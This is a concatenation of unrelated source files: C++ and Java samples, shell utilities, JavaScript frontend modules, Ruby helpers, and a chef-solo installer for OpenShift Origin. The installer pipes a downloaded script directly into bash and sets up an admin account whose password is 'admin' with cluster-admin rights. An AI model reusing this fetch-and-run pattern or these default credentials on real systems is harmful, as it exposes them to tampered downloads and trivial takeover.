std::cout << "Setting body parameter: " << key << " = " << value << std::endl; // Sample implementation
}
};
class PaginationManager {
private:
int pageSize_;
int totalItems_;
int currentPage_;
std::string appName_;
PaginateProjectRequest paginateProjectRequest_;
public:
void setPageSize(int pageSize) {
pageSize_ = pageSize;
}
void setTotalItems(int totalItems) {
totalItems_ = totalItems;
}
void setCurrentPage(int currentPage) {
currentPage_ = currentPage;
}
void setAppName(const std::string& appName) {
appName_ = appName;
paginateProjectRequest_.setAppName(appName_);
}
void displayCurrentPageItems() {
// Implement logic to display items for the current page
std::cout << "Displaying items for page " << currentPage_ << std::endl; // Sample implementation
}
void displayPaginationControls() {
// Implement logic to display pagination controls
std::cout << "Displaying pagination controls" << std::endl; // Sample implementation
}
};
int main() {
PaginationManager paginationManager;
paginationManager.setPageSize(10);
paginationManager.setTotalItems(100);
paginationManager.setCurrentPage(1);
paginationManager.setAppName("SampleApp");
paginationManager.displayCurrentPageItems();
paginationManager.displayPaginationControls();
return 0;
}
|
import java.util.ArrayList;
import java.util.LinkedList;
import java.util.ListIterator;
public class List {
private static void expect(boolean v) {
if (! v) throw new RuntimeException();
}
private static String printList(ArrayList<Integer> list) {
StringBuilder sb = new StringBuilder();
for (Integer i : list) {
sb.append(i);
sb.append(", ");
}
sb.setLength(sb.length()-2);
return sb.toString();
}
private static void isEqual(String s1, String s2) {
System.out.println(s1);
expect(s1.equals(s2));
}
private static void testIterators(java.util.List<Integer> l) {
l.add(1);
l.add(2);
l.add(3);
ListIterator<Integer> it = l.listIterator();
expect(it.next().equals(Integer.valueOf(1)));
expect(it.next().equals(Integer.valueOf(2)));
expect(it.next().equals(Integer.valueOf(3)));
expect(! it.hasNext());
it = l.listIterator(1);
expect(it.next().equals(Integer.valueOf(2)));
expect(it.next().equals(Integer.valueOf(3)));
expect(! it.hasNext());
it = l.listIterator(2);
expect(it.next().equals(Integer.valueOf(3)));
expect(! it.hasNext());
it = l.listIterator(3);
expect(it.previous().equals(Integer.valueOf(3)));
expect(it.previous().equals(Integer.valueOf(2)));
expect(it.previous().equals(Integer.valueOf(1)));
expect(! it.hasPrevious());
it = l.listIterator(2);
expect(it.previous().equals(Integer.valueOf(2)));
expect(it.previous().equals(Integer.valueOf(1)));
expect(! it.hasPrevious());
it = l.listIterator(1);
expect(it.previous().equals(Integer.valueOf(1)));
expect(! it.hasPrevious());
}
private static void testIterators2(java.util.List<Integer> l) {
l.add(1);
l.add(2);
l.add(3);
ListIterator<Integer> it = l.listIterator();
expect(it.next().equals(Integer.valueOf(1)));
it.remove();
expect(it.next().equals(Integer.valueOf(2)));
it.remove();
expect(it.next().equals(Integer.valueOf(3)));
it.remove();
expect(! it.hasNext());
expect(l.isEmpty());
l.add(1);
l.add(2);
l.add(3);
it = l.listIterator(1);
expect(it.next().equals(Integer.valueOf(2)));
it.remove();
expect(it.next().equals(Integer.valueOf(3)));
it.remove();
expect(! it.hasNext());
expect(l.size() == 1);
l.add(2);
l.add(3);
it = l.listIterator(2);
expect(it.next().equals(Integer.valueOf(3)));
it.remove();
expect(! it.hasNext());
expect(l.size() == 2);
l.add(3);
it = l.listIterator(3);
expect(it.previous().equals(Integer.valueOf(3)));
it.remove();
expect(it.previous().equals(Integer.valueOf(2)));
it.remove();
expect(it.previous().equals(Integer.valueOf(1)));
it.remove();
expect(! it.hasPrevious());
expect(l.isEmpty());
l.add(1);
l.add(2);
l.add(3);
it = l.listIterator(2);
expect(it.previous().equals(Integer.valueOf(2)));
it.remove();
expect(it.previous().equals(Integer.valueOf(1)));
it.remove();
expect(! it.hasPrevious());
expect(l.size() == 1);
l.clear();
l.add(1);
l.add(2);
l.add(3);
it = l.listIterator(1);
expect(it.previous().equals(Integer.valueOf(1)));
it.remove();
expect(! it.hasPrevious());
expect(l.size() == 2);
}
private static void testGrow() {
ArrayList<Integer> foo = new ArrayList<Integer>(2);
foo.add(0);
foo.add(1);
foo.add(2); // first grow
foo.add(3);
foo.add(4); // second grow
foo.add(5);
for (int i = 0; i < foo.size(); i++) {
expect(i == foo.get(i));
}
}
private static void testRemove() {
ArrayList<String> foo = new ArrayList<String>(2);
foo.add("Uno");
foo.add("Dos");
foo.add("Tres");
foo.add("Cuatro");
ArrayList<String> fooToRemove = new ArrayList<String>(2);
fooToRemove.add(foo.get(0));
fooToRemove.add(foo.get(1));
for (String s : fooToRemove) {
foo.remove(s);
}
expect(foo.size() == 2);
}
public static void main(String args[]) {
ArrayList<Integer> l = new ArrayList<Integer>();
l.add(1); l.add(2); l.add(3); l.add(4); l.add(5);
isEqual(printList(l), "1, 2, 3, 4, 5");
l.add(0, 6);
isEqual(printList(l), "6, 1, 2, 3, 4, 5");
l.add(2, 7);
isEqual(printList(l), "6, 1, 7, 2, 3, 4, 5");
l.remove(1);
isEqual(printList(l), "6, 7, 2, 3, 4, 5");
l.add(6, 8);
isEqual(printList(l), "6, 7, 2, 3, 4, 5, 8");
Integer[] ints = new Integer[15];
Integer[] z = l.toArray(ints);
expect(z == ints);
for (int i=0; i < z.length; i++) {
System.out.println(z[i]);
}
testIterators(new ArrayList());
testIterators(new LinkedList());
testIterators2(new ArrayList());
testIterators2(new LinkedList());
testGrow();
testRemove();
}
}
|
#!/bin/sh
#
# Copyright (C) 2010 Matthias Buecher (http://www.maddes.net/)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# http://www.gnu.org/licenses/gpl-2.0.txt
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
UIMAGE=$1
# check for uImage magic word
# http://git.denx.de/cgi-bin/gitweb.cgi?p=u-boot.git;a=blob;f=include/image.h
echo 'Checking for uImage magic word...'
MAGIC=`dd if="${UIMAGE}" ibs=4 count=1 | hexdump -v -e '1/1 "%02X"'`
[ '27051956' != "${MAGIC}" ] && { echo 'Not an uImage.' ; exit 1 ; }
# extract data from uImage
echo 'uImage recognized.'
echo 'Extracting data...'
DATAFILE='uImage.data'
dd if="${UIMAGE}" of="${DATAFILE}" ibs=64 skip=1
# check for ARM mach type ( xx 1C A0 E3 xx 10 81 E3 )
# http://www.simtec.co.uk/products/SWLINUX/files/booting_article.html#d0e600
echo 'Checking for ARM mach-type...'
MAGIC=`dd if="${DATAFILE}" ibs=1 skip=1 count=3 | hexdump -v -e '1/1 "%02X"'`
[ '1CA0E3' = "${MAGIC}" ] && {
MAGIC=`dd if="${DATAFILE}" ibs=1 skip=5 count=3 | hexdump -v -e '1/1 "%02X"'`
[ '1081E3' = "${MAGIC}" ] && {
echo 'ARM mach-type header recognized.'
echo 'Extracting mach-type header...'
dd if="${DATAFILE}" of="uImage.mach-type" ibs=8 count=1
ARCH=$(hexdump -v -e '1/1 "%02X "' uImage.mach-type); echo "The mach-type is: $ARCH"
echo 'Stripping mach-type header...'
TMPFILE='uImage.tmp'
dd if="${DATAFILE}" of="${TMPFILE}" ibs=8 skip=1
rm -f "${DATAFILE}"
mv "${TMPFILE}" "${DATAFILE}"
}
}
# check for zImage, otherwise assume Image
# http://www.simtec.co.uk/products/SWLINUX/files/booting_article.html#d0e309
TMPFILE='Image'
echo 'Checking for zImage...'
MAGIC=`dd if="${DATAFILE}" ibs=4 skip=9 count=1 | hexdump -v -e '1/1 "%02X"'`
[ '18286F01' = "${MAGIC}" ] && {
START=`dd if="${DATAFILE}" ibs=4 skip=10 count=1 | hexdump -v -e '1/4 "%08X"'`
END=`dd if="${DATAFILE}" ibs=4 skip=11 count=1 | hexdump -v -e '1/4 "%08X"'`
#
SIZE=$(( 0x${END} - 0x${START} ))
#
echo "zImage recognized with start 0x${START}, end 0x${END} and size ${SIZE}."
TMPFILE='zImage'
}
mv "${DATAFILE}" "${TMPFILE}"
echo ">>> ${UIMAGE} extracted to ${TMPFILE}"
|
#!/bin/bash
date
docker run -it -v ~/.ununifi:/root/.ununifi ghcr.io/ununifi/ununifid:test ununifid collect-gentxs
sudo chown -c -R $USER:docker ~/.ununifi
date
|
export const Uint32SparseSet = (length) => {
const dense = new Uint32Array(length)
const sparse = new Uint32Array(length)
let cursor = 0
dense.count = () => cursor + 1
const has = val => dense[sparse[val]] === val
const add = val => {
if (has(val)) return
sparse[val] = cursor
dense[cursor] = val
cursor++
}
const remove = val => {
if (!has(val)) return
const index = sparse[val]
const swapped = dense[cursor]
if (swapped !== val) {
dense[index] = swapped
sparse[swapped] = index
}
cursor--
}
return {
add,
remove,
has,
sparse,
dense,
}
}
export const SparseSet = () => {
const dense = []
const sparse = []
dense.sort = function (comparator) {
const result = Array.prototype.sort.call(this, comparator)
for(let i = 0; i < dense.length; i++) {
sparse[dense[i]] = i
}
return result
}
const has = val => dense[sparse[val]] === val
const add = val => {
if (has(val)) return
sparse[val] = dense.push(val) - 1
}
const remove = val => {
if (!has(val)) return
const index = sparse[val]
const swapped = dense.pop()
if (swapped !== val) {
dense[index] = swapped
sparse[swapped] = index
}
}
return {
add,
remove,
has,
sparse,
dense,
}
}
|
# frozen_string_literal: true
module Qernel
module NodeApi
# Various helper methods for setting demand of nodes from GQL.
module DemandHelpers
EXPECTED_DEMAND_TOLERANCE = 0.001
# Updates a (power plant) node demand by its electricity output.
#
# That means we have to divide by the conversion of the electricity slot. So that the
# electricity output edge receive that value, otherwise one part would go away to losses.
#
# For example:
#
# UPDATE(... , preset_demand_by_electricity_production, 1000)
#
# 1000 electricity --> +------+
# | 1030 |
# 30 loss --> +------+
#
def preset_demand_by_electricity_production=(value)
set_preset_demand_by_carrier_production(value, :electricity)
end
# Updates a (hydrogen production plant) node demand by its hydrogen output.
#
# That means we have to divide by the conversion of the hydrogen slot. So that the hydrogen
# output edge receive that value, otherwise one part would go away to losses.
#
# For example:
#
# UPDATE(... , preset_demand_by_hydrogen_production, 1000)
#
# 1000 hydrogen --> +------+
# | 1030 |
# 30 loss --> +------+
#
def preset_demand_by_hydrogen_production=(value)
set_preset_demand_by_carrier_production(value, :hydrogen)
end
# Is the calculated near the demand_expected_value?
#
# Returns nil if demand or expected is nil. Returns true if demand is within tolerance
# EXPECTED_DEMAND_TOLERANCE.
def demand_expected?
expected = demand_expected_value
return nil if demand.nil? || expected.nil?
actual = demand.round(4)
expected = expected.round(4)
return true if actual.to_f.zero? && expected.to_f.zero?
(actual.to_f / expected - 1.0).abs < EXPECTED_DEMAND_TOLERANCE
end
private
def set_preset_demand_by_carrier_production(value, carrier_key)
output_slot = node.output(carrier_key)
unless output_slot
raise "UPDATE: preset_demand_by_#{carrier_key}_production could not find " \
"#{carrier_key} output for #{key.inspect}"
end
node.preset_demand = value / output_slot.conversion
end
end
end
end
|
export const lpad = function(str, pad, length){
let _str = ""+str;
if (length && _str.length >= length) {
return _str;
}
return Array((length + 1) - _str.length).join(pad) + _str;
}
|
#!/bin/bash
TREEISH=$1
if [ "$TREEISH" == "" ]; then
TREEISH="HEAD"
fi
export DEBIAN_FRONTEND=noninteractive
function die {
echo $*
exit 1
}
function pre_setup {
apt-get update > /dev/null
#apt-get dist-upgrade -y
}
function install_prereqs {
apt-get -y install build-essential git zsync
apt-get -y install bison flex cmake swig gawk
apt-get -y install libssl-dev libgeoip-dev libmagic-dev libpcap-dev python-dev libcurl4-openssl-dev
apt-get -y install geoip-database-contrib
}
function install_bro {
if [ -e /usr/local/bro/bin/bro ] ; then
echo "bro already installed"
return
fi
cd /usr/src/
if [ -e /tmp/bro.tgz ]; then
tar xzf /tmp/bro.tgz
rm /tmp/bro.tgz
else
git clone --recursive git://git.bro.org/bro
fi
cd bro
git fetch origin $TREEISH
git pull
git checkout $TREEISH || die "checkout failed"
git submodule update --recursive --init
#overkill?
git reset --hard
git submodule foreach --recursive git reset --hard
git checkout .
git submodule foreach --recursive git checkout .
./configure || die "configure failed"
make -j2 || die "build failed"
sudo make install || die "install failed"
make clean
#change ownership to bro user
chown -R bro: /usr/src/bro
}
function configure_bro {
if [ ! -e /bro ]; then
ln -s /usr/local/bro /bro
fi
if [ ! -e /bro/site ]; then
(cd /bro ; ln -s share/bro/site . )
fi
echo 'export PATH=$PATH:/bro/bin' > /etc/profile.d/bro.sh
ln -s /home/bro/exercises /exercises
}
pre_setup
install_prereqs
install_bro
configure_bro
exit 0
|
# Python3 program to find LCM of two numbers
# method to return gcd of a and b
def gcd(a, b):
if a == 0 :
return b
return gcd(b % a, a)
# method to return LCM of two numbers
def lcm(a, b):
return (a*b) // gcd(a, b)
|
#!/bin/bash
export GOPATH=$PWD
if [ ! -f .git/hooks/pre-commit ]; then
chmod +x hooks/pre-commit
ln -s ../../hooks/pre-commit .git/hooks/
fi
|
import re
import numpy as np
def process_chinese_sentences(file_path: str) -> List[List[str]]:
sents = []
with open(file_path, 'r', encoding='utf-8') as f:
for line in f.readlines():
sents.append(line.strip())
sents = [re.split(' +', s) for s in sents] # Split sentences into words based on spaces
sents = [[w for w in s if w] for s in sents] # Remove empty strings from the sentences
np.random.shuffle(sents) # Shuffle the sentences
return sents
|
#!/usr/bin/env bash
function describe_actions() {
echo " 📦 Install the latest pass package from Homebrew"
echo " 🛠 Configure syncing of the passwordstore database"
}
function install() {
install_homebrew_package "pass"
local -r pass_config_path="$HOME/.password-store"
if [ -d "$pass_config_path" ]; then
echo "Passwordstore configuration already exists at $pass_config_path"
else
echo "Symlinking passwordstore configuration to $DOTFILES_BASE_PATH..."
ln -s "$DOTFILES_BASE_PATH/.password-store" "$pass_config_path"
fi
}
|
<reponame>wuximing/dsshop<gh_stars>0
exports.ids = [69];
exports.modules = {
/***/ 296:
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
__webpack_require__.r(__webpack_exports__);
/* harmony import */ var _api_goodIndent__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(22);
/* harmony default export */ __webpack_exports__["default"] = ({
layout: 'user',
head() {
return {
title: '订单详情-个人中心'
};
},
data() {
return {
loading: true,
buttonLoading: false,
total: 0,
indent: {}
};
},
mounted() {
this.getDetail();
},
methods: {
async getDetail() {
if (!$nuxt.$route.query.id) {
this.$message({
message: '参数有误,请联系管理员',
type: 'error'
});
$nuxt.$router.go(-1);
return false;
}
await Promise.all([Object(_api_goodIndent__WEBPACK_IMPORTED_MODULE_0__[/* detail */ "e"])($nuxt.$route.query.id)]).then(([indentData]) => {
this.indent = indentData;
this.total = 0;
let specification = null;
this.indent.goods_list.forEach(item => {
this.total += item.price * item.number;
if (item.good_sku) {
specification = null;
item.good_sku.product_sku.forEach(item2 => {
if (specification) {
specification += item2.value + ';';
} else {
specification = item2.value + ';';
}
});
item.specification = specification.substr(0, specification.length - 1);
}
});
this.total = Number(this.total.toFixed(2));
this.loading = false;
}).catch(error => {
this.loading = false;
});
},
// 确认收货
confirmReceipt() {
this.$confirm('是否确认收货?', '提示', {
confirmButtonText: '确认',
cancelButtonText: '取消',
type: 'warning'
}).then(() => {
this.buttonLoading = true;
Object(_api_goodIndent__WEBPACK_IMPORTED_MODULE_0__[/* receipt */ "i"])(this.indent.id).then(response => {
this.buttonLoading = false;
this.$message({
message: '操作成功',
type: 'success'
});
this.getDetail();
}).catch(() => {
this.buttonLoading = false;
});
}).catch(() => {});
},
goBack() {
$nuxt.$router.go(-1);
}
}
});
/***/ })
};;
//# sourceMappingURL=detail.js.map
|
$(function(){
//滑动模块
mui('.mui-scroll-wrapper').scroll({
deceleration: 0.0005 //flick 减速系数,系数越大,滚动速度越慢,滚动距离越小,默认值0.0006
});
//获取左边盒子的信息
$.ajax({
url:'/category/queryTopCategory',
type:'get',
success:function(result){
//获得信息后通过模板引擎拼接字符串
var str = template('leftListTpl',{data:result.rows});
//将字符串内容添加到左边盒子中
$('#leftListBox').html(str);
//判断:如果获取到了一级分类信息,则显示二级分类信息,并默认选中第一项
if(result.rows[0].total != 0){
//调用获取二级分类信息的函数,传入参数
getSecondData(result.rows[0].id);
$('#leftListBox li').eq(0).addClass('active');
}
}
});
//给左边的li绑定事件,点击时获取对应的二级分类信息
$('#leftListBox').on('click','li',function(){
//通过自定义属性的方式获得当前点击li的id值,用于传入后台查询对应的二级分类信息
var id = $(this).data('id');//$(this).attr('data-id');
//获取二级分类信息 并显示在页面上
getSecondData(id);
$(this).addClass('active').siblings().removeClass('active');
});
//获取二级分类型信息的函数,需要对应的id值
function getSecondData(id){
$.ajax({
url:'/category/querySecondCategory',
type:'get',
data:{
id:id
},
success:function(result){
var str = template('rightListTpl',{data:result.rows});
$('#rightListBox').html(str);
}
});
}
})
|
export JAVA_HOME=/usr/java/jdk1.8.0_40
|
#!/bin/bash
cd "$(dirname "${BASH_SOURCE[0]}")" \
&& source "utils.sh"
###############################################################################
# SSH and Github
###############################################################################
copy_key_github() {
# adapted for WSL2
inform 'Public key copied! Paste into Github…'
local os=""
os="$(get_os)"
if [[ "$os" == "macOS" ]]; then
[[ -f $pub ]] && cat $pub | pbcopy
open 'https://github.com/settings/keys'
elif [[ "$os" == ubuntu ]] && check_wsl; then
# in WSL; Windows apps are available
[[ -f $pub ]] && < "$pub" /mnt/c/Windows/System32/clip.exe
wslview "https://github.com/settings/keys"
else
# unsure of OS
print_warning "Unsure of OS; please enter key into Github manually."
fi
read -r -p " ✦ Press enter to continue…"
print_success "SSH key"
return
}
github_key_check() {
if ask "SSH key found. Enter it in Github?" Y; then
copy_key_github;
else
print_success "SSH key";
fi
}
create_ssh_key() {
if ask "No SSH key found. Create one?" Y; then
ssh-keygen -t ed25519; github_key_check;
else
return 0;
fi
}
ssh_key_setup() {
local pub=$HOME/.ssh/id_ed25519.pub
if ! [[ -f $pub ]]; then
create_ssh_key
else
github_key_check
fi
}
main() {
chapter "Setup Github SSH keys"
ssh_key_setup
}
main
|
class PlusPuntuation extends BaseObject{
constructor(scene, value, x, y){
super(scene, "PlusPuntuation", true);
this.value = value;
this.x = x;
this.y = y;
this.create();
}
create(forceCreation){
if (forceCreation == undefined)
forceCreation = true;
var $this = this;
this.characters = this.scene.font.addString("+"+this.value, this.x, this.y, 0.4, forceCreation);
var list = [];
this.characters.forEach(function(character){
list.push(character.object);
})
this.scene.tweens.add({
targets: list,
y: this.y-100,
alpha:0,
ease: 'linear',
duration: 500,
onComplete: function (){
$this.characters.forEach(function(character){
character.die();
})
}
});
}
}
|
#!/bin/bash
#kubectl delete ns wardle
#kubectl delete -f artifacts/example/auth-delegator.yaml -n kube-system
#kubectl delete -f artifacts/example/auth-reader.yaml -n kube-system
#kubectl delete -f artifacts/example/apiservice.yaml
kubectl create -f artifacts/example/ns.yaml
kubectl create configmap -n discovery kind-compositions-config-map --from-file=kind_compositions.yaml
kubectl create -f artifacts/example/sa.yaml -n discovery
kubectl create -f artifacts/example/auth-delegator.yaml -n kube-system
kubectl create -f artifacts/example/auth-reader.yaml -n kube-system
kubectl create -f artifacts/example/grant-cluster-admin.yaml
kubectl create -f artifacts/example/rc.yaml -n discovery
kubectl create -f artifacts/example/service.yaml -n discovery
kubectl create -f artifacts/example/apiservice.yaml
|
import {
BadRequestException,
ValidationError,
ValidationPipe,
} from '@nestjs/common';
import { NestFactory } from '@nestjs/core';
import { UserInputError } from 'apollo-server-express';
import { AppModule } from './app.module';
async function bootstrap() {
const app = await NestFactory.create(AppModule);
app.useGlobalPipes(
new ValidationPipe({
transform: true,
exceptionFactory: (errors: ValidationError[]) => {
const error_messages = errors.map((error) =>
Object.values(error.constraints),
);
return new BadRequestException(error_messages.toString());
},
forbidUnknownValues: false,
}),
);
await app.listen(3000);
}
bootstrap();
|
<gh_stars>0
package duhuafei.function.active;
/** sigmoid激活函数
* Created by Duhuafei on 11/09/2019.
*/
public class Sigmoid {
public static double eval(Double x){
if (null == x){
x = 0.0;
}
return 1.0 / (1 + Math.exp(-x));
}
}
|
#!/bin/bash
# MIT License
# Copyright (c) 2021 Tuukka Pasanen
# Copyright (c) 2020, Ilmi Solutions Oy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Description:
# Run NginX in container
#
NGINX_LOCATION="/etc/nginx"
function copy_nginx_site()
{
enable_site="${NGINX_LOCATION}/${1}/sites/${vhost}"
nginx_site="${NGINX_LOCATION}/${1}/${vhost}"
if [ -f "${enable_site}" ] && [ ! -L "${nginx_site}" ] && [ ! -f "${nginx_site}" ]
then
cp "${enable_site}" "${nginx_site}"
fi
}
# shellcheck disable=SC2068
for vhost in ${VHOST_SITES[@]}
do
copy_nginx_site "vhosts.d" "${vhost}"
done
# shellcheck disable=SC2068
for vhost in ${RTMP_SITES[@]}
do
copy_nginx_site "rtmp.d" "${vhost}"
done
# shellcheck disable=SC2068
for vhost in ${STREAM_SITES[@]}
do
copy_nginx_site "stream.d" "${vhost}"
done
# Run UWSGI before NGINX
if [[ "${USE_UWSGI}" == "yes" ]]
then
/usr/sbin/uwsgi -d --ini /etc/uwsgi/uwsgi.ini
fi
# Run Memcache if needed
if [[ "${USE_MEMCACHED}" == "yes" ]]
then
/usr/sbin/memcached -u memcached -d
fi
# Run NGINX on 80 and 443
if [[ "${USE_NGINX}" == "yes" ]]
then
/usr/sbin/nginx
fi
# Run PHP-FPM inside Docker image
if [[ "${USE_PHPFPM}" == "yes" ]]
then
/usr/sbin/php-fpm --fpm-config /etc/php7/fpm/php-fpm.conf
fi
# Sleep forever if we are in container
if [[ "$1" == "-d" ]]
then
while true
do
sleep 1000
done
fi
if [[ "$1" == "-bash" ]]
then
/bin/bash
fi
|
#!/bin/bash
set -e
clear
cat << BASH
############################################################
# "All in the box" (Master, ETCD and Node in a server) #
############################################################
BASH
IP_DETECT=$(ip route get 8.8.8.8 | awk 'NR==1 {print $NF}')
DF=""
read -p "Please enter the FQDN of the server: " FQDN
read -p "Please enter the IP of the server (Auto Detect): $IP_DETECT" IP
if [ -z $IP ]
then IP=$IP_DETECT
fi
# Add the above information in /etc/hosts
# Remove existing entries
sed -i "/$IP/d" /etc/hosts
echo -e "$IP\t$FQDN" >> /etc/hosts
### Update the server
echo "Updating system, please wait..."
yum -y update -q -e 0
### Create the chef-local mode infrastructure
mkdir -p ~/chef-solo-example/{backup,cache,roles,cookbooks,environments}
cd ~/chef-solo-example/cookbooks
### Installing dependencies
echo "Installing prerequisite packages, please wait..."
curl -s -L https://omnitruck.chef.io/install.sh | bash
yum install -y git
### Installing cookbooks
[ -d ~/chef-solo-example/cookbooks/cookbook-openshift3 ] || git clone -q https://github.com/IshentRas/cookbook-openshift3.git
[ -d ~/chef-solo-example/cookbooks/iptables ] || git clone -q https://github.com/chef-cookbooks/iptables.git
[ -d ~/chef-solo-example/cookbooks/yum ] || git clone -q https://github.com/chef-cookbooks/yum.git
[ -d ~/chef-solo-example/cookbooks/selinux_policy ] || git clone -q https://github.com/BackSlasher/chef-selinuxpolicy.git selinux_policy
[ -d ~/chef-solo-example/cookbooks/compat_resource ] || git clone -q https://github.com/chef-cookbooks/compat_resource.git
[ -d ~/chef-solo-example/cookbooks/docker ] || git clone -q https://github.com/chef-cookbooks/docker.git
cd ~/chef-solo-example
### Create the dedicated environment for Origin deployment
cat << BASH > environments/origin.json
{
"name": "origin",
"description": "",
"cookbook_versions": {
},
"json_class": "Chef::Environment",
"chef_type": "environment",
"default_attributes": {
},
"override_attributes": {
"cookbook-openshift3": {
"openshift_common_sdn_network_plugin_name": "redhat/openshift-ovs-multitenant",
"openshift_cluster_name": "console.${IP}.nip.io",
"openshift_HA": true,
"openshift_deployment_type": "origin",
"openshift_common_default_nodeSelector": "region=infra",
"deploy_containerized": true,
"deploy_example": true,
"openshift_master_htpasswd_users": [
{
"admin": "$apr1$5iDjNKyc$Cp8.GumvS3Q2jxeXYGptd."
}
],
"openshift_master_router_subdomain": "cloudapps.${IP}.nip.io",
"master_servers": [
{
"fqdn": "${FQDN}",
"ipaddress": "$IP"
}
],
"etcd_servers": [
{
"fqdn": "${FQDN}",
"ipaddress": "$IP"
}
],
"node_servers": [
{
"fqdn": "${FQDN}",
"ipaddress": "$IP",
"schedulable": true,
"labels": "region=infra"
}
]
}
}
}
BASH
### Specify the configuration details for chef-solo
cat << BASH > /root/chef-solo-example/solo.rb
cookbook_path [
'/root/chef-solo-example/cookbooks',
'/root/chef-solo-example/site-cookbooks'
]
environment_path '/root/chef-solo-example/environments'
file_backup_path '/root/chef-solo-example/backup'
file_cache_path '/root/chef-solo-example/cache'
log_location STDOUT
solo true
BASH
### Create run_list
cat << BASH > /root/chef-solo-example/run_list.json
{
"run_list": [
"recipe[cookbook-openshift3::default]"
]
}
BASH
### Deploy OSE !!!!
chef-solo --environment origin -c ~/chef-solo-example/solo.rb -j ~/chef-solo-example/run_list.json --legacy
if ! $(oc get project demo --config=/etc/origin/master/admin.kubeconfig &> /dev/null)
then
# Put admin user in cluster-admin group
oc adm policy add-cluster-role-to-user cluster-admin admin
# Create a demo project
oc adm new-project demo --display-name="Origin Demo Project" --admin=admin
oc create -f /root/chef-solo-example/cookbooks/cookbook-openshift3/scripts/build_and_run.yml &> /dev/null
fi
# Enable completion of commands
. /etc/bash_completion.d/oc
cat << BASH
##### Installation DONE ######
##### ######
Your installation of Origin is completed.
An admin user has been created for you.
Username is : admin
Password is : admin
A Sample application has been deployed :-)
Access the console here : https://console.${IP}.nip.io:8443/console
You can also login via CLI : oc login -u admin
Next steps for you :
1) Read the documentation : https://docs.openshift.org/latest/welcome/index.html
##############################
########## DONE ##############
BASH
|
import { filter, each, isArray, clone } from '@antv/util';
import BBox from '../../util/bbox';
import { getLegendComponents, getAxisComponents } from '../../util/common';
/**
* 处理图表padding的逻辑:
* 注册参与padding的自定义组件
*/
var PaddingController = /** @class */ (function () {
function PaddingController(cfg) {
this.innerPaddingComponents = [];
this.outerPaddingComponents = [];
this.plot = cfg.plot;
}
PaddingController.prototype.registerPadding = function (component, type, checkIfExist) {
if (type === void 0) { type = 'outer'; }
if (checkIfExist === void 0) { checkIfExist = false; }
if (type === 'inner') {
if (checkIfExist) {
if (!this.innerPaddingComponents.find(function (c) { return c == component; })) {
this.innerPaddingComponents.push(component);
}
}
else {
this.innerPaddingComponents.push(component);
}
}
else {
if (checkIfExist) {
if (!this.outerPaddingComponents.find(function (c) { return c == component; })) {
this.outerPaddingComponents.push(component);
}
}
else {
this.outerPaddingComponents.push(component);
}
}
};
PaddingController.prototype.getPaddingComponents = function (type) {
if (type === void 0) { type = 'outer'; }
return (type === 'outer' ? this.outerPaddingComponents : this.innerPaddingComponents) || [];
};
/**
* 清除已经注册的元素
*/
PaddingController.prototype.clear = function () {
this.innerPaddingComponents = [];
// 一些组件是在view渲染完成之后渲染初始化的
// TODO: afterRender的什么时候清除
this.outerPaddingComponents = filter(this.outerPaddingComponents, function (component) { return component.afterRender; });
};
PaddingController.prototype.clearOuterComponents = function () {
each(this.outerPaddingComponents, function (component) {
if (component.afterRender) {
component.destroy();
}
});
this.outerPaddingComponents = [];
};
PaddingController.prototype.getPadding = function () {
var props = this.plot.options;
var padding = props.padding ? props.padding : this.plot.config.theme.padding;
if (padding === 'auto') {
return [0, 0, 0, 1];
}
return padding;
};
/** view层的padding计算 */
PaddingController.prototype.processAutoPadding = function () {
var padding = this._getInnerAutoPadding();
this.plot.updateConfig({
padding: padding,
});
this.plot.render();
};
PaddingController.prototype.processOuterPadding = function () {
if (!this.plot.layerBBox) {
this.plot.layerBBox = new BBox(this.plot.x, this.plot.y, this.plot.width, this.plot.height);
}
var viewMinX = this.plot.layerBBox.minX;
var viewMaxX = this.plot.layerBBox.maxX;
var viewMinY = this.plot.layerBBox.minY;
var viewMaxY = this.plot.layerBBox.maxY;
each(this.outerPaddingComponents, function (component) {
var position = component.position;
if (component.destroyed) {
return;
}
var _a = component.getBBox(), minX = _a.minX, maxX = _a.maxX, minY = _a.minY, maxY = _a.maxY;
if (maxY >= viewMinY && maxY <= viewMaxY && position === 'top') {
viewMinY = maxY;
}
if (minY >= viewMinY && minY <= viewMaxY && position === 'bottom') {
viewMaxY = minY;
}
if (maxX > viewMinX && maxX <= viewMaxX && position === 'left') {
viewMinX = maxX;
}
if (minX >= viewMinX && maxX <= viewMaxX && position === 'right') {
viewMaxX = minX;
}
});
return new BBox(viewMinX, viewMinY, viewMaxX - viewMinX, viewMaxY - viewMinY);
};
PaddingController.prototype._getInnerAutoPadding = function () {
var _a;
var props = this.plot.options;
var view = this.plot.view;
var viewRange = view.coordinateBBox;
var maxX = viewRange.maxX, maxY = viewRange.maxY, minY = viewRange.minY, minX = viewRange.minX;
var bleeding = this.plot.config.theme.bleeding;
if (isArray(bleeding)) {
each(bleeding, function (it, index) {
if (typeof bleeding[index] === 'function') {
